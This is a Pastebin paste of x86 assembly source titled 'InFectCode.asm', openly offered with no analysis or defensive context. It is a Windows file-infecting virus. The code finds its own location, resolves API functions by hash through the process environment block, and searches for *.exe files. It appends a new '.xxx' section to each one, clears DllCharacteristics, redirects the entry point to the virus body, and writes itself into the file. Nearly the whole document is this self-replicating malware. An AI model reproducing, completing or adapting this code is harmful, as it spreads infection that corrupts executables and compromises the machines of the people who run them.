API tools faq
paste
Advertisement
Guest User

InFectCode.asm

a guest
Jul 18th, 2018
130
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
ASM (NASM) 11.40 KB | None | 0 0
raw download clone embed print report
  1. .386
  2. .model flat, stdcall
  3.  
  4. option casemap:none
  5. assume fs:nothing
  6. .code
  7. start:
  8. v_start:
  9.     call delta
  10. delta:
  11.     pop ebp
  12.     sub ebp, offset delta  
  13.     lea esi, [ebp + WIN32_FIND_DATA]
  14.     push esi
  15.     lea esi, [ebp + exe]
  16.     push esi
  17.     push 095DA3590h
  18.     call getapi
  19.     call eax
  20.     mov [ebp + hFind], eax
  21.     test eax,eax
  22.     jne _findName
  23.     push [ebp + hFind]
  24.     push 05E70317Ch
  25.     call getapi
  26.     call eax
  27.     ;jmp _exit
  28. _findName:
  29.    lea esi, [ebp + WIN32_FIND_DATA.cFileName]
  30.  
  31. _returnHost:
  32.   lea eax, [ebp +_returnHost]
  33.   mov [ebp + returnHost], eax
  34.   call infect
  35.   lea esi, [ebp + WIN32_FIND_DATA]
  36.   push esi
  37.   push [ebp + hFind]
  38.   push 0F76C45E7h
  39.   call getapi
  40.   call eax
  41.   cmp eax, 0
  42.   jne _findName
  43.   ;ret
  44. _exit:  
  45.   ; ExitProcess
  46.     lea eax, [ebp + v_start]
  47.     cmp eax, 401000h
  48.     je  _jmpOEP
  49.     ; end writefile
  50.     mov eax, [ebp + OEPFileInFect]
  51.     push eax
  52.     ret
  53. _jmpOEP:    
  54.     call jmpOEPHostFile    
  55.     ;mov eax,0
  56.     ;push eax
  57.     ;push 56A2B5F0h
  58.     ;call getapi
  59.     ;call eax
  60. infect proc    
  61.     push 00h
  62.     push 80h
  63.     push 3
  64.     push 0
  65.     push 3
  66.     push 0C0000000h
  67.     ;lea esi, [ebp + filename]
  68.     push esi
  69.     push 04FDAF6DAh
  70.     call getapi
  71.     call eax
  72.     ;--- GetFileSize
  73.     mov [ebp+ hFile], eax
  74.     cmp eax, 0FFFFFFFFh
  75.     je _exitFunc
  76.     push 0
  77.     push [ebp+hFile]
  78.     push 0701E12C6h
  79.     call getapi
  80.     call eax
  81.     ;--- GetProcessHeap
  82.     mov [ebp + FileSize], eax
  83.     push 0F8245751h
  84.     call getapi
  85.     call eax
  86.     ;--- HeapAlloc
  87.     push [ebp + FileSize]
  88.     push 9
  89.     push eax
  90.     push 067CC0818h
  91.     call getapi
  92.     call eax
  93.     mov [ebp+ BaseAddress],eax
  94.     ;--- ReadFile
  95.     push 0
  96.     lea esi, [ebp+BR]
  97.     push esi
  98.     push [ebp + FileSize]
  99.     push [ebp + BaseAddress]
  100.     push [ebp + hFile]
  101.     push 0BB5F9EADh
  102.     call getapi
  103.     call eax
  104.     ;--- RtlMoveMemory
  105.     push 40h
  106.     push [ebp + BaseAddress]
  107.     lea esi, [ebp + dosHeader]
  108.     push esi
  109.     push 081788FF6h
  110.     call getapi
  111.     call eax
  112.  
  113.     ;--- get NTHeader
  114.     mov eax, [ebp+ BaseAddress]
  115.     add eax, [ebp + dosHeader + 3Ch]
  116.     push 0F8h
  117.     push eax
  118.     lea esi, [ebp+ NTHeader]
  119.     push esi
  120.     push 081788FF6h
  121.     call getapi
  122.     call eax
  123.  
  124.     ;--- get infomation
  125.     xor ebx, ebx
  126.     movzx ebx, word ptr [ebp + NTHeader +6]
  127.     mov [ebp + numberOfSections], bx
  128.  
  129.     mov ebx, [ebp + NTHeader +40]
  130.     mov [ebp+ OEP], ebx
  131.  
  132.     mov ebx, [ebp + NTHeader + 52]
  133.     mov [ebp+ imageBase], ebx
  134.  
  135.     mov ebx, [ebp + NTHeader + 56]
  136.     mov [ebp + sectionAlignment], ebx
  137.  
  138.     mov ebx, [ebp + NTHeader + 60]
  139.     mov [ebp + fileAlignment], ebx
  140.    
  141.     ; --- get last Section
  142.     ;--- sai bắt đầu chỗ này
  143.     mov esi, [ebp + BaseAddress]
  144.     mov eax, [esi + 03ch]
  145.     add esi, eax
  146.  
  147.     mov ax, word ptr [esi + 014h]
  148.     add esi, eax
  149.    
  150.     add esi, 18h
  151.     mov eax, 28h
  152.     movzx ebx, [ebp + numberOfSections]
  153.     mul ebx
  154.     add esi, eax
  155.     sub esi, 28h
  156.     mov eax, [esi]
  157.     ; if sectionName = ".xxx" => injected
  158.     cmp eax, 07878782eh
  159.     je _exitFunc
  160.     mov eax, [esi + 8]
  161.     mov [ebp + virtualSize], eax
  162.  
  163.     mov eax, [esi + 0ch]
  164.     mov [ebp + virtualAddress], eax
  165.  
  166.     mov eax, [esi + 10h]
  167.     mov [ebp + sizeOfRawData], eax
  168.  
  169.     mov eax, [esi + 14h]
  170.     mov [ebp + pointerToRawData], eax
  171.  
  172.     add esi,28h
  173.     ;--- RtlZeroMemory new SectionName
  174.     push 28h
  175.     push esi
  176.     push 0BD784139h
  177.     call getapi
  178.     call eax
  179.     ;---- RtlMoveMemory new SectionName
  180.     push 08h
  181.     lea ebx, [ebp +sectionName]
  182.     push ebx
  183.     push esi
  184.     push 081788FF6h
  185.     call getapi
  186.     call eax
  187.     ;--- Alignmentment
  188.     mov edi, 800h
  189.     mov ecx, [ebp + sectionAlignment]
  190.     mov edx, 0h
  191.     call Alignment
  192.     ; virtualSize
  193.     mov dword ptr [esi + 8], eax
  194.    
  195.  
  196.     mov edi, [ebp + virtualSize]
  197.     mov ecx, [ebp + sectionAlignment]
  198.     mov edx, [ebp + virtualAddress]
  199.     call Alignment
  200.     ; virtualAddress
  201.     mov dword ptr [esi + 0Ch], eax
  202.    
  203.  
  204.     mov edi, 800h
  205.     mov ecx, [ebp + fileAlignment]
  206.     mov edx, 0
  207.     call Alignment
  208.     ; SizeOfRawData
  209.     mov dword ptr [esi + 10h], eax
  210.  
  211.     mov edi, [ebp + sizeOfRawData]
  212.     mov ecx, [ebp + fileAlignment]
  213.     mov edx, [ebp + pointerToRawData]
  214.     call Alignment
  215.     ;PointerToRawData
  216.     mov dword ptr [esi + 14h], eax
  217.     ;Characteristics
  218.     mov dword ptr [esi + 24h], 0E00000E0h
  219.  
  220.     mov ebx, [esi + 8]
  221.     mov [ebp + virtualSize], ebx
  222.  
  223.     mov ebx, [esi + 0Ch]
  224.     mov [ebp + virtualAddress], ebx
  225.  
  226.     mov ebx, [esi + 10h]
  227.     add ebx, [esi + 14h]
  228.  
  229.     ;--- SetFilePointer
  230.     push 2
  231.     push 0
  232.     push ebx
  233.     push [ebp + hFile]
  234.     push 0D812CDAAh
  235.     call getapi
  236.     call eax
  237.  
  238.     ;--- SetEndOfFile
  239.     push [ebp + hFile]
  240.     push 0D7E3CBDBh
  241.     call getapi
  242.     call eax
  243.     ;--- inc numberOfSections
  244.     mov eax, [ebp + BaseAddress]
  245.     mov ebx, [eax + 03ch]
  246.     add eax, ebx
  247.     mov bx, word ptr [eax + 06h]
  248.     inc ebx
  249.     mov [eax + 06h], bx
  250.     ;---set DllCharacteristics = 0
  251.     xor ecx, ecx
  252.     mov [eax + 05eh],cx
  253.     ;--- Set SizeOfImage
  254.     mov ecx, [ebp + virtualAddress]
  255.     add ecx, [ebp + virtualSize]
  256.  
  257.     mov [eax + 050h], ecx
  258.     ;-- Set addressOfEntryPoint
  259.     mov ecx, [ebp + virtualAddress]
  260.     mov [eax + 28h], ecx
  261.     mov [ebp + addressOfEntryPoint],ecx
  262.     ;--- SetFilePointer And WriteFile
  263.     push 0
  264.     push 0
  265.     push 0
  266.     push [ebp + hFile]
  267.     push 0D812CDAAh
  268.     call getapi
  269.     call eax
  270.     ;---------- WriteFile
  271.  
  272.     ; MsgBox
  273.     push 6c6ch
  274.     push 642e3233h
  275.     push 72657375h
  276.     push esp
  277.     push 0726774Ch
  278.     call getapi
  279.     call eax
  280.     push 41786fh
  281.     push 42656761h
  282.     push 7373654Dh
  283.     push esp
  284.     push eax
  285.     push 07802F749h
  286.     call getapi
  287.     call eax
  288.     xor edi, edi
  289.     push edi
  290.     push 021646574h
  291.     push 06365666eh
  292.     push 06920746fh
  293.     push 067206576h
  294.     push 027756f59h
  295.     mov ecx,esp
  296.     push edi
  297.     push edi
  298.     push ecx
  299.     push edi
  300.     xor ebx,ebx
  301.     call eax
  302.     ; end MsgBox
  303.     lea eax, [ebp + v_start]
  304.     cmp eax, 401000h
  305.     jne _next  
  306.     mov eax, [ebp + imageBase]
  307.     add eax, [ebp + OEP]
  308.     mov [ebp + OEP], eax
  309.     mov [ebp + OEPFileInFect], eax
  310.  
  311. _next:
  312.     push 0
  313.     lea esi, [ebp + BR]
  314.     push esi
  315.     push [ebp + FileSize]
  316.     push [ebp + BaseAddress]
  317.     push [ebp + hFile]
  318.     push 05BAE572Dh
  319.     call getapi
  320.     call eax
  321.     ; end writefile
  322.  
  323.     ; file infect
  324.     lea eax, [ebp + v_start]
  325.     lea ecx, [ebp + v_ends]
  326.     sub ecx, eax
  327.     mov [ebp + vrsize], ecx
  328.    
  329.     lea esi, [ebp + v_start]
  330.     push 0
  331.     lea ebx, [ebp + dwByte]
  332.     push ebx
  333.     push ecx
  334.     push esi
  335.     push [ebp + hFile]
  336.     push 05BAE572Dh
  337.     call getapi
  338.     call eax
  339.     ;lea eax, [ebp + v_start]
  340.     ;cmp eax, 401000h
  341.     ;je _exitFunc
  342.     ; end writefile
  343.     ;mov eax, [ebp + OEPFileInFect]
  344.     ;push eax
  345.     ;ret
  346.  
  347. _exitFunc:
  348.     push [ebp + hFile]
  349.     push 0528796C6h
  350.     call getapi
  351.     call eax
  352.     mov eax, [ebp + returnHost]
  353.     add eax, 11h
  354.     push eax
  355.     ret
  356.     ;xor eax,eax
  357.     ;push eax
  358.     ;push 56A2B5F0h ; hash func ExitProcess
  359.     ;call getapi    ; return address func to eax  
  360.     ;call eax
  361. infect endp    
  362.  
  363. jmpOEPHostFile proc
  364.     ;push [ebp + hFile]
  365.     ;push 0528796C6h
  366.     ;call getapi
  367.     ;call eax
  368.     ;mov eax, [ebp + returnHost]
  369.     ;add eax, 11h
  370.    ; push eax
  371.     ;ret
  372.     xor eax,eax
  373.     push eax
  374.     push 56A2B5F0h ; hash func ExitProcess
  375.     call getapi    ; return address func to eax  
  376.     call eax
  377. jmpOEPHostFile endp
  378. ; getapi func return func address to eax
  379. getapi proc
  380. api_call:
  381.   pushad                
  382.   mov ebp, esp          
  383.   xor eax, eax        
  384.   mov edx, fs:[eax+48]
  385.   mov edx, [edx+12]    
  386.   mov edx, [edx+20]    
  387. next_mod:                
  388.   mov esi, [edx+40]      
  389.   movzx ecx, word ptr [edx+38]
  390.   xor edi, edi        
  391. loop_modname:          
  392.   lodsb                
  393.   cmp al, 'a'          
  394.   jl not_lowercase      
  395.   sub al, 20h          
  396. not_lowercase:          
  397.   ror edi, 13          
  398.   add edi, eax          
  399.   loop loop_modname    
  400.   push edx              
  401.   push edi          
  402.   mov edx, [edx+16]    
  403.   mov ecx, [edx+60]    
  404.   mov ecx, [ecx+edx+120]
  405.   jecxz get_next_mod1  
  406.   add ecx, edx          
  407.   push ecx            
  408.   mov ebx, [ecx+32]    
  409.   add ebx, edx          
  410.   mov ecx, [ecx+24]      
  411. get_next_func:          
  412.   jecxz get_next_mod    
  413.   dec ecx              
  414.   mov esi, [ebx+ecx*4]  
  415.   add esi, edx          
  416.   xor edi, edi        
  417. loop_funcname:          
  418.   lodsb                
  419.   ror edi, 13            
  420.   add edi, eax        
  421.   cmp al, ah            
  422.   jne loop_funcname    
  423.   add edi, [ebp-8]      
  424.   cmp edi, [ebp+36]    
  425.   jnz get_next_func    
  426.   pop eax                
  427.   mov ebx, [eax+36]      
  428.   add ebx, edx          
  429.   mov cx, [ebx+2*ecx]  
  430.   mov ebx, [eax+28]      
  431.   add ebx, edx          
  432.   mov eax, [ebx+4*ecx]  
  433.   add eax, edx          
  434.   jmp finish
  435. get_next_mod:            
  436.   pop edi                
  437. get_next_mod1:          
  438.   pop edi              
  439.   pop edx              
  440.   mov edx, [edx]      
  441.   jmp short next_mod    
  442. finish:
  443.   mov [esp+36], eax    
  444.   pop ebx              
  445.   pop ebx              
  446.   popad                
  447.   pop ecx                
  448.   pop edx              
  449.   push ecx              
  450.   ret
  451. getapi endp
  452. Alignment proc
  453.   mov [ebp + sizeofSection], edi
  454.   mov [ebp + tmp], ecx
  455.   mov [ebp + address], edx
  456.   mov eax, [ebp +sizeofSection]
  457.   cdq
  458.   idiv ecx
  459.   mov eax, edx
  460.   test eax, eax
  461.   jne _L2
  462.   mov edx, [ebp + address]
  463.   mov eax, [ebp +sizeofSection]
  464.   add eax, edx
  465.   jmp _L3
  466. _L2:
  467.   mov eax, [ebp +sizeofSection]
  468.   cdq
  469.   idiv [ebp + tmp]
  470.   add eax, 1
  471.   imul eax, [ebp + tmp]
  472.   mov edx, eax
  473.   mov eax, [ebp + address]
  474.   add eax, edx
  475. _L3:
  476.   ret
  477.  
  478. Alignment endp
  479. apitabe:
  480.     returnHost              DWORD ?
  481.     sectionName             db ".xxx",0
  482.     OEPFileInFect           DWORD ?
  483.     exe                     db "*.exe",0
  484.     hFile                   dd ?
  485.     hFind                   DWORD ?
  486.     BaseAddress             dd ?
  487.     BR                      DWORD ?  
  488.     dwByte                  dd ?
  489.     addressOfEntryPoint     DWORD ?
  490.     imageBase               DWORD ?
  491.     numberOfSections        dw ?
  492.     FileSize                DWORD ?
  493.     sectionAlignment        DWORD ?
  494.     fileAlignment           DWORD ?
  495.     virtualAddress          DWORD ?
  496.     virtualSize             DWORD ?      
  497.     OEP                     DWORD ?
  498.     dosHeader               DWORD ?
  499.     NTHeader                DWORD ?
  500.     tmp                     DWORD ?  
  501.     sizeofSection           DWORD ?
  502.     address                 DWORD ?
  503.     sizeOfRawData           DWORD ?
  504.     pointerToRawData        DWORD ?
  505.     vrsize                  dd 0  
  506. FILETIME STRUCT
  507.   dwLowDateTime     DWORD     ?
  508.   dwHighDateTime    DWORD     ?
  509. FILETIME ENDS
  510.  
  511. WIN32_FIND_DATAA STRUCT
  512.    dwFileAttributes       DWORD ?
  513.    ftCreationTime         FILETIME <>
  514.    ftLastAccessTime       FILETIME <>
  515.    ftLastWriteTime        FILETIME <>
  516.    nFileSizeHigh          DWORD ?
  517.    nFileSizeLow           DWORD ?
  518.    dwReserved0            DWORD ?
  519.    dwReserved1            DWORD ?
  520.    cFileName              BYTE 512 dup (?)
  521.    cAlternateFileName     BYTE 14 dup (?)
  522. WIN32_FIND_DATAA ENDS
  523.  
  524. WIN32_FIND_DATA                       WIN32_FIND_DATAA <?>
  525. v_ends:    
  526. end start
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!